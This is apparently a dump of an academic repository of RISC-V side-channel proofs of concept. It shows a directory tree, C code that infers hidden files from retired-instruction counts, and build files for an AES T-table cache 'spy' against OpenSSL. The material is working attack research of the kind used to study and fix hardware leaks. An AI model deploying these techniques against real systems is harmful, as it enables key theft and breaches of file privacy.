├── README.md ├── access-retired ├── Makefile ├── README.md └── main.c ├── aes_example ├── README.md ├── er │ ├── Makefile │ └── spy.cpp ├── fr │ ├── Makefile │ └── spy.cpp └── pp │ ├── Makefile │ └── spy.cpp ├── evict_reload_histogram ├── Makefile ├── README.md └── hist.c ├── fence-flush ├── Makefile ├── README.md └── hist.c ├── fgprime_probe_histogram ├── Makefile ├── README.md └── hist.c ├── flush-fault ├── Makefile ├── README.md ├── flush-fault.c ├── flush-ret.c └── stats.py ├── flush_flush_histogram ├── Makefile ├── README.md └── hist.c ├── flush_reload_histogram ├── Makefile ├── README.md └── hist.c ├── iflush_reload_histogram ├── Makefile ├── README.md └── hist.c ├── inst-cycles ├── Makefile ├── README.md └── main.c ├── interrupt-timing ├── Makefile ├── README.md └── attacker.c ├── m-mode-instr-count ├── Makefile ├── README.md ├── example.c └── module │ ├── Makefile │ ├── sample.c │ └── sample.h ├── mbedtls-key-leak ├── Makefile ├── README.md ├── build.py ├── decrypt.c ├── encrypt.c ├── evaluate-attack.py ├── generate_header.py ├── get_offsets.py ├── keys │ ├── rsa_priv0.txt │ ├── rsa_priv1.txt │ ├── rsa_priv2.txt │ ├── rsa_priv3.txt │ ├── rsa_priv4.txt │ ├── rsa_priv5.txt │ ├── rsa_priv6.txt │ ├── rsa_priv7.txt │ ├── rsa_priv8.txt │ ├── rsa_priv9.txt │ ├── rsa_pub0.txt │ ├── rsa_pub1.txt │ ├── rsa_pub2.txt │ ├── rsa_pub3.txt │ ├── rsa_pub4.txt │ ├── rsa_pub5.txt │ ├── rsa_pub6.txt │ ├── rsa_pub7.txt │ ├── rsa_pub8.txt │ └── rsa_pub9.txt └── mbedtls │ ├── .idea │ ├── .gitignore │ ├── inspectionProfiles │ │ └── Project_Default.xml │ ├── misc.xml │ └── vcs.xml │ ├── CMakeLists.txt │ ├── ChangeLog │ ├── DartConfiguration.tcl │ ├── LICENSE │ ├── Makefile │ ├── README.rst │ ├── configs │ ├── README.txt │ ├── config-ccm-psk-tls1_2.h │ ├── config-mini-tls1_1.h │ ├── config-picocoin.h │ ├── config-psk-rc4-tls1_0.h │ └── config-suite-b.h │ ├── doxygen │ ├── input │ │ ├── doc_encdec.h │ │ ├── doc_hashing.h │ │ ├── doc_mainpage.h │ │ ├── doc_rng.h │ │ ├── doc_ssltls.h │ │ ├── doc_tcpip.h │ │ └── doc_x509.h │ └── mbedtls.doxyfile │ ├── include │ ├── .gitignore │ ├── CMakeLists.txt │ └── polarssl │ │ ├── aes.h │ │ ├── aesni.h │ │ ├── arc4.h │ │ ├── asn1.h │ │ ├── asn1write.h │ │ ├── base64.h │ │ ├── bignum.h │ │ ├── blowfish.h │ │ ├── bn_mul.h │ │ ├── camellia.h │ │ ├── ccm.h │ │ ├── certs.h │ │ ├── check_config.h │ │ ├── cipher.h │ │ ├── cipher_wrap.h │ │ ├── compat-1.2.h │ │ ├── config.h │ │ ├── ctr_drbg.h │ │ ├── debug.h │ │ ├── des.h │ │ ├── dhm.h │ │ ├── ecdh.h │ │ ├── ecdsa.h │ │ ├── ecp.h │ │ ├── entropy.h │ │ ├── entropy_poll.h │ │ ├── error.h │ │ ├── gcm.h │ │ ├── havege.h │ │ ├── hmac_drbg.h │ │ ├── md.h │ │ ├── md2.h │ │ ├── md4.h │ │ ├── md5.h │ │ ├── md_wrap.h │ │ ├── memory.h │ │ ├── memory_buffer_alloc.h │ │ ├── net.h │ │ ├── oid.h │ │ ├── openssl.h │ │ ├── padlock.h │ │ ├── pbkdf2.h │ │ ├── pem.h │ │ ├── pk.h │ │ ├── pk_wrap.h │ │ ├── pkcs11.h │ │ ├── pkcs12.h │ │ ├── pkcs5.h │ │ ├── platform.h │ │ ├── ripemd160.h │ │ ├── rsa.h │ │ ├── sha1.h │ │ ├── sha256.h │ │ ├── sha512.h │ │ ├── ssl.h │ │ ├── ssl_cache.h │ │ ├── ssl_ciphersuites.h │ │ ├── threading.h │ │ ├── timing.h │ │ ├── version.h │ │ ├── x509.h │ │ ├── x509_crl.h │ │ ├── x509_crt.h │ │ ├── x509_csr.h │ │ └── xtea.h │ ├── library │ ├── .gitignore │ ├── CMakeLists.txt │ ├── Makefile │ ├── aes.c │ ├── aesni.c │ ├── arc4.c │ ├── asn1parse.c │ ├── asn1write.c │ ├── base64.c │ ├── bignum.c │ ├── bignum.c.working-with-ret │ ├── blowfish.c │ ├── cacheutils.h │ ├── camellia.c │ ├── ccm.c │ ├── certs.c │ ├── cipher.c │ ├── cipher_wrap.c │ ├── ctr_drbg.c │ ├── debug.c │ ├── des.c │ ├── dhm.c │ ├── ecdh.c │ ├── ecdsa.c │ ├── ecp.c │ ├── ecp_curves.c │ ├── entropy.c │ ├── entropy_poll.c │ ├── error.c │ ├── gcm.c │ ├── havege.c │ ├── hmac_drbg.c │ ├── md.c │ ├── md2.c │ ├── md4.c │ ├── md5.c │ ├── md_wrap.c │ ├── memory_buffer_alloc.c │ ├── net.c │ ├── oid.c │ ├── padlock.c │ ├── pbkdf2.c │ ├── pem.c │ ├── pk.c │ ├── pk_wrap.c │ ├── pkcs11.c │ ├── pkcs12.c │ ├── pkcs5.c │ ├── pkparse.c │ ├── pkwrite.c │ ├── platform.c │ ├── ripemd160.c │ ├── rsa.c │ ├── sha1.c │ ├── sha256.c │ ├── sha512.c │ ├── ssl_cache.c │ ├── ssl_ciphersuites.c │ ├── ssl_cli.c │ ├── ssl_srv.c │ ├── ssl_tls.c │ ├── stJMMJFc │ ├── threading.c │ ├── timing.c │ ├── version.c │ ├── version_features.c │ ├── x509.c │ ├── x509_create.c │ ├── x509_crl.c │ ├── x509_crt.c │ ├── x509_csr.c │ ├── x509write_crt.c │ ├── x509write_csr.c │ └── xtea.c │ ├── programs │ ├── .gitignore │ ├── CMakeLists.txt │ ├── Makefile │ ├── aes │ │ ├── CMakeLists.txt │ │ ├── aescrypt2.c │ │ └── crypt_and_hash.c │ ├── hash │ │ ├── CMakeLists.txt │ │ ├── generic_sum.c │ │ ├── hello.c │ │ ├── md5sum.c │ │ ├── sha1sum.c │ │ └── sha2sum.c │ ├── pkey │ │ ├── CMakeLists.txt │ │ ├── dh_client.c │ │ ├── dh_genprime.c │ │ ├── dh_prime.txt │ │ ├── dh_server.c │ │ ├── ecdsa.c │ │ ├── gen_key.c │ │ ├── key_app.c │ │ ├── key_app_writer.c │ │ ├── mpi_demo.c │ │ ├── pk_decrypt.c │ │ ├── pk_encrypt.c │ │ ├── pk_sign.c │ │ ├── pk_verify.c │ │ ├── rsa_decrypt.c │ │ ├── rsa_encrypt.c │ │ ├── rsa_genkey.c │ │ ├── rsa_priv.txt │ │ ├── rsa_pub.txt │ │ ├── rsa_sign.c │ │ ├── rsa_sign_pss.c │ │ ├── rsa_verify.c │ │ └── rsa_verify_pss.c │ ├── random │ │ ├── CMakeLists.txt │ │ ├── gen_entropy.c │ │ ├── gen_random_ctr_drbg.c │ │ └── gen_random_havege.c │ ├── ssl │ │ ├── CMakeLists.txt │ │ ├── ssl_client1.c │ │ ├── ssl_client2.c │ │ ├── ssl_fork_server.c │ │ ├── ssl_mail_client.c │ │ ├── ssl_pthread_server.c │ │ ├── ssl_server.c │ │ └── ssl_server2.c │ ├── test │ │ ├── CMakeLists.txt │ │ ├── benchmark.c │ │ ├── o_p_test.c │ │ ├── selftest.c │ │ ├── ssl_cert_test.c │ │ └── ssl_test.c │ ├── util │ │ ├── CMakeLists.txt │ │ ├── pem2der.c │ │ └── strerror.c │ ├── wince_main.c │ └── x509 │ │ ├── CMakeLists.txt │ │ ├── cert_app.c │ │ ├── cert_req.c │ │ ├── cert_write.c │ │ ├── crl_app.c │ │ └── req_app.c │ ├── readme.md │ ├── scripts │ ├── activate-config.pl │ ├── bump_version.sh │ ├── check_doxy_blocks.pl │ ├── config.pl │ ├── data_files │ │ ├── error.fmt │ │ ├── version_features.fmt │ │ ├── vs2010-app-template.vcxproj │ │ ├── vs2010-main-template.vcxproj │ │ ├── vs2010-sln-template.sln │ │ ├── vs6-app-template.dsp │ │ ├── vs6-main-template.dsp │ │ └── vs6-workspace-template.dsw │ ├── generate_errors.pl │ ├── generate_features.pl │ ├── generate_visualc_files.pl │ ├── malloc-init.pl │ ├── polarssl_symlinks.sh │ ├── recursion.pl │ └── tmp_ignore_makefiles.sh │ ├── tests │ ├── .gitignore │ ├── CMakeLists.txt │ ├── Descriptions.txt │ ├── Makefile │ ├── compat.sh │ ├── data_files │ │ ├── Readme-x509.txt │ │ ├── cert_example_multi.crt │ │ ├── cert_example_multi_nocn.crt │ │ ├── cert_example_wildcard.crt │ │ ├── cert_md2.crt │ │ ├── cert_md4.crt │ │ ├── cert_md5.crt │ │ ├── cert_sha1.crt │ │ ├── cert_sha224.crt │ │ ├── cert_sha256.crt │ │ ├── cert_sha384.crt │ │ ├── cert_sha512.crt │ │ ├── cert_v1_with_ext.crt │ │ ├── cli2.crt │ │ ├── cli2.key │ │ ├── crl-ec-sha1.pem │ │ ├── crl-ec-sha224.pem │ │ ├── crl-ec-sha256.pem │ │ ├── crl-ec-sha384.pem │ │ ├── crl-ec-sha512.pem │ │ ├── crl-future.pem │ │ ├── crl-rsa-pss-sha1-badsign.pem │ │ ├── crl-rsa-pss-sha1.pem │ │ ├── crl-rsa-pss-sha224.pem │ │ ├── crl-rsa-pss-sha256.pem │ │ ├── crl-rsa-pss-sha384.pem │ │ ├── crl-rsa-pss-sha512.pem │ │ ├── crl.pem │ │ ├── crl_cat_ec-rsa.pem │ │ ├── crl_cat_ecfut-rsa.pem │ │ ├── crl_cat_rsa-ec.pem │ │ ├── crl_cat_rsabadpem-ec.pem │ │ ├── crl_expired.pem │ │ ├── crl_md2.pem │ │ ├── crl_md4.pem │ │ ├── crl_md5.pem │ │ ├── crl_sha1.pem │ │ ├── crl_sha224.pem │ │ ├── crl_sha256.pem │ │ ├── crl_sha384.pem │ │ ├── crl_sha512.pem │ │ ├── crt_cat_rsaexp-ec.pem │ │ ├── dhparams.pem │ │ ├── dir1 │ │ │ └── test-ca.crt │ │ ├── dir2 │ │ │ ├── test-ca.crt │ │ │ └── test-ca2.crt │ │ ├── dir3 │ │ │ ├── Readme │ │ │ ├── test-ca.crt │ │ │ └── test-ca2.crt │ │ ├── ec_224_prv.pem │ │ ├── ec_224_pub.pem │ │ ├── ec_256_prv.pem │ │ ├── ec_256_pub.pem │ │ ├── ec_384_prv.pem │ │ ├── ec_384_pub.pem │ │ ├── ec_521_prv.pem │ │ ├── ec_521_pub.pem │ │ ├── ec_bp256_prv.pem │ │ ├── ec_bp256_pub.pem │ │ ├── ec_bp384_prv.pem │ │ ├── ec_bp384_pub.pem │ │ ├── ec_bp512_prv.pem │ │ ├── ec_bp512_pub.pem │ │ ├── ec_prv.pk8.der │ │ ├── ec_prv.pk8.pem │ │ ├── ec_prv.pk8.pw.der │ │ ├── ec_prv.pk8.pw.pem │ │ ├── ec_prv.sec1.der │ │ ├── ec_prv.sec1.pem │ │ ├── ec_prv.sec1.pw.pem │ │ ├── ec_prv.specdom.der │ │ ├── ec_pub.der │ │ ├── ec_pub.pem │ │ ├── enco-ca-prstr.pem │ │ ├── enco-cert-utf8str.pem │ │ ├── format_gen.key │ │ ├── format_gen.pub │ │ ├── format_pkcs12.fmt │ │ ├── format_rsa.key │ │ ├── hash_file_1 │ │ ├── hash_file_2 │ │ ├── hash_file_3 │ │ ├── hash_file_4 │ │ ├── hash_file_5 │ │ ├── keyfile │ │ ├── keyfile.3des │ │ ├── keyfile.aes128 │ │ ├── keyfile.aes192 │ │ ├── keyfile.aes256 │ │ ├── keyfile.des │ │ ├── mpi_10 │ │ ├── mpi_too_big │ │ ├── passwd.psk │ │ ├── pkcs8_pbe_sha1_2des.key │ │ ├── pkcs8_pbe_sha1_3des.der │ │ ├── pkcs8_pbe_sha1_3des.key │ │ ├── pkcs8_pbe_sha1_rc4_128.key │ │ ├── pkcs8_pbes2_pbkdf2_3des.der │ │ ├── pkcs8_pbes2_pbkdf2_3des.key │ │ ├── pkcs8_pbes2_pbkdf2_des.key │ │ ├── rsa4096_prv.pem │ │ ├── rsa4096_pub.pem │ │ ├── server1-nospace.crt │ │ ├── server1-v1.crt │ │ ├── server1.cert_type.crt │ │ ├── server1.crt │ │ ├── server1.ext_ku.crt │ │ ├── server1.key │ │ ├── server1.key_usage.crt │ │ ├── server1.pubkey │ │ ├── server1.req.cert_type │ │ ├── server1.req.key_usage │ │ ├── server1.req.ku-ct │ │ ├── server1.req.md4 │ │ ├── server1.req.md5 │ │ ├── server1.req.sha1 │ │ ├── server1.req.sha224 │ │ ├── server1.req.sha256 │ │ ├── server1.req.sha384 │ │ ├── server1.req.sha512 │ │ ├── server1.v1.crt │ │ ├── server2-badsign.crt │ │ ├── server2-v1-chain.crt │ │ ├── server2-v1.crt │ │ ├── server2.crt │ │ ├── server2.key │ │ ├── server2.ku-ds.crt │ │ ├── server2.ku-ds_ke.crt │ │ ├── server2.ku-ka.crt │ │ ├── server2.ku-ke.crt │ │ ├── server3.crt │ │ ├── server3.key │ │ ├── server4.crt │ │ ├── server4.key │ │ ├── server5-badsign.crt │ │ ├── server5-expired.crt │ │ ├── server5-future.crt │ │ ├── server5-selfsigned.crt │ │ ├── server5-sha1.crt │ │ ├── server5-sha224.crt │ │ ├── server5-sha384.crt │ │ ├── server5-sha512.crt │ │ ├── server5.crt │ │ ├── server5.eku-cli.crt │ │ ├── server5.eku-cs.crt │ │ ├── server5.eku-cs_any.crt │ │ ├── server5.eku-srv.crt │ │ ├── server5.eku-srv_cli.crt │ │ ├── server5.key │ │ ├── server5.ku-ds.crt │ │ ├── server5.ku-ka.crt │ │ ├── server5.ku-ke.crt │ │ ├── server5.req.ku.sha1 │ │ ├── server5.req.sha1 │ │ ├── server5.req.sha224 │ │ ├── server5.req.sha256 │ │ ├── server5.req.sha384 │ │ ├── server5.req.sha512 │ │ ├── server6-ss-child.crt │ │ ├── server6.crt │ │ ├── server6.key │ │ ├── server7.crt │ │ ├── server7.key │ │ ├── server7_all_space.crt │ │ ├── server7_int-ca.crt │ │ ├── server7_pem_space.crt │ │ ├── server8.crt │ │ ├── server8.key │ │ ├── server8_int-ca2.crt │ │ ├── server9-bad-mgfhash.crt │ │ ├── server9-bad-saltlen.crt │ │ ├── server9-badsign.crt │ │ ├── server9-defaults.crt │ │ ├── server9-sha224.crt │ │ ├── server9-sha256.crt │ │ ├── server9-sha384.crt │ │ ├── server9-sha512.crt │ │ ├── server9-with-ca.crt │ │ ├── server9.crt │ │ ├── server9.key │ │ ├── server9.req.sha1 │ │ ├── server9.req.sha224 │ │ ├── server9.req.sha256 │ │ ├── server9.req.sha384 │ │ ├── server9.req.sha512 │ │ ├── test-ca-v1.crt │ │ ├── test-ca.crt │ │ ├── test-ca.key │ │ ├── test-ca2.crt │ │ ├── test-ca2.key │ │ ├── test-ca2.ku-crl.crt │ │ ├── test-ca2.ku-crt.crt │ │ ├── test-ca2.ku-crt_crl.crt │ │ ├── test-ca2.ku-ds.crt │ │ ├── test-ca_cat12.crt │ │ ├── test-ca_cat21.crt │ │ ├── test-int-ca.crt │ │ ├── test-int-ca.key │ │ ├── test-int-ca2.crt │ │ └── test-int-ca2.key │ ├── scripts │ │ ├── all.sh │ │ ├── curves.pl │ │ ├── gen_ctr_drbg.pl │ │ ├── gen_gcm_decrypt.pl │ │ ├── gen_gcm_encrypt.pl │ │ ├── gen_pkcs1_v21_sign_verify.pl │ │ ├── generate_code.pl │ │ └── test-ref-configs.pl │ ├── ssl-opt.sh │ └── suites │ │ ├── helpers.function │ │ ├── main_test.function │ │ ├── test_suite_aes.cbc.data │ │ ├── test_suite_aes.cfb.data │ │ ├── test_suite_aes.ecb.data │ │ ├── test_suite_aes.function │ │ ├── test_suite_aes.rest.data │ │ ├── test_suite_arc4.data │ │ ├── test_suite_arc4.function │ │ ├── test_suite_asn1write.data │ │ ├── test_suite_asn1write.function │ │ ├── test_suite_base64.data │ │ ├── test_suite_base64.function │ │ ├── test_suite_blowfish.data │ │ ├── test_suite_blowfish.function │ │ ├── test_suite_camellia.data │ │ ├── test_suite_camellia.function │ │ ├── test_suite_ccm.data │ │ ├── test_suite_ccm.function │ │ ├── test_suite_cipher.aes.data │ │ ├── test_suite_cipher.arc4.data │ │ ├── test_suite_cipher.blowfish.data │ │ ├── test_suite_cipher.camellia.data │ │ ├── test_suite_cipher.ccm.data │ │ ├── test_suite_cipher.des.data │ │ ├── test_suite_cipher.function │ │ ├── test_suite_cipher.gcm.data │ │ ├── test_suite_cipher.null.data │ │ ├── test_suite_cipher.padding.data │ │ ├── test_suite_ctr_drbg.data │ │ ├── test_suite_ctr_drbg.function │ │ ├── test_suite_debug.data │ │ ├── test_suite_debug.function │ │ ├── test_suite_des.data │ │ ├── test_suite_des.function │ │ ├── test_suite_dhm.data │ │ ├── test_suite_dhm.function │ │ ├── test_suite_ecdh.data │ │ ├── test_suite_ecdh.function │ │ ├── test_suite_ecdsa.data │ │ ├── test_suite_ecdsa.function │ │ ├── test_suite_ecp.data │ │ ├── test_suite_ecp.function │ │ ├── test_suite_entropy.data │ │ ├── test_suite_entropy.function │ │ ├── test_suite_error.data │ │ ├── test_suite_error.function │ │ ├── test_suite_gcm.aes128_de.data │ │ ├── test_suite_gcm.aes128_en.data │ │ ├── test_suite_gcm.aes192_de.data │ │ ├── test_suite_gcm.aes192_en.data │ │ ├── test_suite_gcm.aes256_de.data │ │ ├── test_suite_gcm.aes256_en.data │ │ ├── test_suite_gcm.camellia.data │ │ ├── test_suite_gcm.function │ │ ├── test_suite_hmac_drbg.function │ │ ├── test_suite_hmac_drbg.misc.data │ │ ├── test_suite_hmac_drbg.no_reseed.data │ │ ├── test_suite_hmac_drbg.nopr.data │ │ ├── test_suite_hmac_drbg.pr.data │ │ ├── test_suite_hmac_shax.data │ │ ├── test_suite_hmac_shax.function │ │ ├── test_suite_md.data │ │ ├── test_suite_md.function │ │ ├── test_suite_mdx.data │ │ ├── test_suite_mdx.function │ │ ├── test_suite_memory_buffer_alloc.data │ │ ├── test_suite_memory_buffer_alloc.function │ │ ├── test_suite_mpi.data │ │ ├── test_suite_mpi.function │ │ ├── test_suite_pbkdf2.data │ │ ├── test_suite_pbkdf2.function │ │ ├── test_suite_pem.data │ │ ├── test_suite_pem.function │ │ ├── test_suite_pk.data │ │ ├── test_suite_pk.function │ │ ├── test_suite_pkcs1_v21.data │ │ ├── test_suite_pkcs1_v21.function │ │ ├── test_suite_pkcs5.data │ │ ├── test_suite_pkcs5.function │ │ ├── test_suite_pkparse.data │ │ ├── test_suite_pkparse.function │ │ ├── test_suite_pkwrite.data │ │ ├── test_suite_pkwrite.function │ │ ├── test_suite_rsa.data │ │ ├── test_suite_rsa.function │ │ ├── test_suite_shax.data │ │ ├── test_suite_shax.function │ │ ├── test_suite_version.data │ │ ├── test_suite_version.function │ │ ├── test_suite_x509parse.data │ │ ├── test_suite_x509parse.function │ │ ├── test_suite_x509write.data │ │ ├── test_suite_x509write.function │ │ ├── test_suite_xtea.data │ │ └── test_suite_xtea.function │ └── visualc │ ├── VS2010 │ ├── aescrypt2.vcxproj │ ├── benchmark.vcxproj │ ├── cert_app.vcxproj │ ├── cert_req.vcxproj │ ├── crl_app.vcxproj │ ├── crypt_and_hash.vcxproj │ ├── dh_client.vcxproj │ ├── dh_genprime.vcxproj │ ├── dh_server.vcxproj │ ├── gen_entropy.vcxproj │ ├── gen_key.vcxproj │ ├── gen_random_ctr_drbg.vcxproj │ ├── gen_random_havege.vcxproj │ ├── generic_sum.vcxproj │ ├── hello.vcxproj │ ├── key_app.vcxproj │ ├── key_app_writer.vcxproj │ ├── mbedTLS.sln │ ├── mbedTLS.vcxproj │ ├── md5sum.vcxproj │ ├── mpi_demo.vcxproj │ ├── pem2der.vcxproj │ ├── pk_decrypt.vcxproj │ ├── pk_encrypt.vcxproj │ ├── pk_sign.vcxproj │ ├── pk_verify.vcxproj │ ├── rsa_decrypt.vcxproj │ ├── rsa_encrypt.vcxproj │ ├── rsa_genkey.vcxproj │ ├── rsa_sign.vcxproj │ ├── rsa_sign_pss.vcxproj │ ├── rsa_verify.vcxproj │ ├── rsa_verify_pss.vcxproj │ ├── selftest.vcxproj │ ├── sha1sum.vcxproj │ ├── sha2sum.vcxproj │ ├── ssl_cert_test.vcxproj │ ├── ssl_client1.vcxproj │ ├── ssl_client2.vcxproj │ ├── ssl_fork_server.vcxproj │ ├── ssl_mail_client.vcxproj │ ├── ssl_server.vcxproj │ ├── ssl_server2.vcxproj │ ├── ssl_test.vcxproj │ └── strerror.vcxproj │ └── VS6 │ ├── aescrypt2.dsp │ ├── benchmark.dsp │ ├── cert_app.dsp │ ├── cert_req.dsp │ ├── crl_app.dsp │ ├── crypt_and_hash.dsp │ ├── dh_client.dsp │ ├── dh_genprime.dsp │ ├── dh_prime.txt │ ├── dh_server.dsp │ ├── gen_entropy.dsp │ ├── gen_key.dsp │ ├── gen_random_ctr_drbg.dsp │ ├── gen_random_havege.dsp │ ├── generic_sum.dsp │ ├── hello.dsp │ ├── key_app.dsp │ ├── key_app_writer.dsp │ ├── mbedtls.dsp │ ├── mbedtls.dsw │ ├── md5sum.dsp │ ├── mpi_demo.dsp │ ├── pem2der.dsp │ ├── pk_decrypt.dsp │ ├── pk_encrypt.dsp │ ├── pk_sign.dsp │ ├── pk_verify.dsp │ ├── rsa_decrypt.dsp │ ├── rsa_encrypt.dsp │ ├── rsa_genkey.dsp │ ├── rsa_priv.txt │ ├── rsa_pub.txt │ ├── rsa_sign.dsp │ ├── rsa_sign_pss.dsp │ ├── rsa_verify.dsp │ ├── rsa_verify_pss.dsp │ ├── selftest.dsp │ ├── sha1sum.dsp │ ├── sha2sum.dsp │ ├── ssl_cert_test.dsp │ ├── ssl_client1.dsp │ ├── ssl_client2.dsp │ ├── ssl_fork_server.dsp │ ├── ssl_mail_client.dsp │ ├── ssl_server.dsp │ ├── ssl_server2.dsp │ ├── ssl_test.dsp │ └── strerror.dsp ├── page-walk ├── Makefile ├── README.md └── main.c ├── prime_probe_histogram ├── Makefile ├── README.md └── hist.c ├── rlibsc.h ├── spectre-v1 ├── Makefile ├── README.md └── hist.c ├── spectre ├── Makefile ├── README.md └── spectre.c ├── square-multiply ├── Makefile ├── README.md └── main.c ├── timer-drift ├── Makefile ├── README.md └── main.c ├── timer-evaluation ├── Makefile ├── README.md ├── main.c └── timer-resolution.c ├── tlb_evict_histogram ├── Makefile ├── README.md └── hist.c └── zigzagger ├── Makefile ├── README.md ├── asm.S └── main.c /access-retired/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc main.c -Os -o main 3 | 4 | prepare: 5 | mkdir sec 6 | touch sec/foo 7 | chmod 0000 sec/foo 8 | chmod 0111 sec 9 | clean: 10 | rm -f main 11 | sudo rm -rf sec 12 | 13 | -------------------------------------------------------------------------------- /access-retired/README.md: -------------------------------------------------------------------------------- 1 | # Discover Hidden Files using Retired Instructions 2 | 3 | This PoC detects if a file exists in a folder that does not allow a directory listing by relying on the retired-instructions performance counter. 4 | The PoC tries to open various files, which always fails (return value is NULL). 5 | However, the number of retired instructions is higher if the file exists. 6 | 7 | ## Usage 8 | Build the PoC using `make`, and create the inaccessible folder using `make prepare`. 9 | Then run `./main`. 10 | 11 | ## Works on 12 | C906, U74, C910, C908 -------------------------------------------------------------------------------- /access-retired/main.c: -------------------------------------------------------------------------------- 1 | #include "../rlibsc.h" 2 | #include 3 | #include 4 | #include 5 | 6 | // Incresing the repetitions can reduce the noise making the PoC more precise 7 | #define REP 3 8 | 9 | int main() { 10 | size_t timings[26]; 11 | memset(timings, 0, sizeof(timings)); 12 | char p[] = "sec/aoo"; 13 | // Iterate over all files and time open call 14 | for (int i = 0; i < 26; i++) { 15 | size_t sum = 0, min = -1; 16 | volatile FILE *f; 17 | for (int avg = 0; avg < REP; avg++) { 18 | sched_yield(); 19 | size_t before = rdinstret(); 20 | f = fopen(p, "r"); 21 | size_t after = rdinstret(); 22 | size_t delta = after - before; 23 | sum += delta; 24 | if (delta < min) 25 | min = delta; 26 | } 27 | timings[i] = min; 28 | printf("%s: %zd (avg: %zd)\n", p, min, sum); 29 | p[4]++; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /aes_example/README.md: -------------------------------------------------------------------------------- 1 | # AES T-table 2 | 3 | 4 | # Run code 5 | To compile opensssl 1.0.1e run the following commands in your **home** folder. 6 | ``` 7 | wget https://github.com/openssl/openssl/releases/download/OpenSSL_1_0_1e/openssl-1.0.1e.tar.gz 8 | tar -xzf openssl-1.0.1e.tar.gz 9 | cd openssl-1.0.1e 10 | ./config shared 11 | make 12 | ``` 13 | 14 | Then put the compiled openssl version in your library path 15 | `export LD_LIBRARY_PATH=$HOME/openssl-1.0.1e:$LD_LIBRARY_PATH` 16 | 17 | Run the PoC with the respective binary 18 | `make; ./spy-c906` on the C906 processor or `make; ./spy-u74` on the U74 processor 19 | 20 | 21 | If the results dont look good you can 22 | 1. Make sure `TE0-3` is in a decreasing order 23 | 2. change the threshold 24 | `#define MIN_CACHE_PROBE_CYCLES` and `#define MIN_CACHE_MISS_CYCLES` 25 | 26 | # Works on 27 | C906 (Flush+Reload, Prime+Probe, Evict+Reload), U74 (Prime+Probe, Evict+Reload) 28 | -------------------------------------------------------------------------------- /aes_example/er/Makefile: -------------------------------------------------------------------------------- 1 | lcryptpath = $(HOME)/openssl-1.0.1e/libcrypto.so 2 | te0 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te0 | cut -d ' ' -f 1) 3 | te1 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te1 | cut -d ' ' -f 1) 4 | te2 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te2 | cut -d ' ' -f 1) 5 | te3 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te3 | cut -d ' ' -f 1) 6 | 7 | all: spy-u74 spy-c906 8 | 9 | clean: 10 | rm -f *.o spy-u74 spy-c906 11 | 12 | spy-c906: spy.cpp 13 | g++ -g -std=gnu++11 -DC906 -DLIBCRYPTO_PATH=\"$(lcryptpath)\" -DTE0=0x$(te0) -DTE1=0x$(te1) -DTE2=0x$(te2) -DTE3=0x$(te3) -Os -o $@ $< -I~/openssl-1.0.1e/include/openssl -L~/openssl/ -lcrypto 14 | 15 | spy-u74: spy.cpp 16 | g++ -g -std=gnu++11 -DU74 -DLIBCRYPTO_PATH=\"$(lcryptpath)\" -DTE0=0x$(te0) -DTE1=0x$(te1) -DTE2=0x$(te2) -DTE3=0x$(te3) -Os -o $@ $< -I~/openssl-1.0.1e/include/openssl -L~/openssl/ -lcrypto 17 | -------------------------------------------------------------------------------- /aes_example/fr/Makefile: -------------------------------------------------------------------------------- 1 | lcryptpath = $(HOME)/openssl-1.0.1e/libcrypto.so 2 | te0 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te0 | cut -d ' ' -f 1) 3 | te1 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te1 | cut -d ' ' -f 1) 4 | te2 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te2 | cut -d ' ' -f 1) 5 | te3 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te3 | cut -d ' ' -f 1) 6 | 7 | 8 | all: spy 9 | clean: 10 | rm -f *.o spy 11 | spy: spy.cpp 12 | g++ -std=gnu++11 -DC906 -DLIBCRYPTO_PATH=\"$(lcryptpath)\" -DTE0=0x$(te0) -DTE1=0x$(te1) -DTE2=0x$(te2) -DTE3=0x$(te3) -O2 -o $@ $< -I~/openssl-1.0.1e/include/openssl -L~/openssl/ -lcrypto 13 | 14 | -------------------------------------------------------------------------------- /aes_example/pp/Makefile: -------------------------------------------------------------------------------- 1 | lcryptpath = $(HOME)/openssl-1.0.1e/libcrypto.so 2 | te0 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te0 | cut -d ' ' -f 1) 3 | te1 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te1 | cut -d ' ' -f 1) 4 | te2 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te2 | cut -d ' ' -f 1) 5 | te3 := $(shell nm ~/openssl-1.0.1e/libcrypto.so | grep Te3 | cut -d ' ' -f 1) 6 | 7 | all: spy-u74 spy-c906 8 | 9 | clean: 10 | rm -f *.o spy-u74 spy-c906 11 | 12 | spy-c906: spy.cpp 13 | g++ -g -std=gnu++11 -DC906 -DLIBCRYPTO_PATH=\"$(lcryptpath)\" -DTE0=0x$(te0) -DTE1=0x$(te1) -DTE2=0x$(te2) -DTE3=0x$(te3) -Os -o $@ $< -I~/openssl-1.0.1e/include/openssl -L~/openssl/ -lcrypto 14 | 15 | spy-u74: spy.cpp 16 | g++ -g -std=gnu++11 -DU74 -DLIBCRYPTO_PATH=\"$(lcryptpath)\" -DTE0=0x$(te0) -DTE1=0x$(te1) -DTE2=0x$(te2) -DTE3=0x$(te3) -Os -o $@ $< -I~/openssl-1.0.1e/include/openssl -L~/openssl/ -lcrypto -------------------------------------------------------------------------------- /evict_reload_histogram/Makefile: -------------------------------------------------------------------------------- 1 | all: hist-c906 hist-u74 2 | 3 | hist-c906: hist.c 4 | gcc hist.c -DC906 -Os -o hist-c906 5 | 6 | hist-u74: hist.c 7 | gcc hist.c -DU74 -Os -o hist-u74 8 | 9 | clean: 10 | rm -f hist-c906 hist-u74 11 | 12 | -------------------------------------------------------------------------------- /evict_reload_histogram/README.md: -------------------------------------------------------------------------------- 1 | # Evict+Reload Histogram 2 | 3 | Prints a simple Evict+Reload histogram. 4 | The eviction strategy is different for the U74 and C906 as they use differenct cache replacement strategies. 5 | 6 | # Run 7 | Running `make` gives two binaries, run 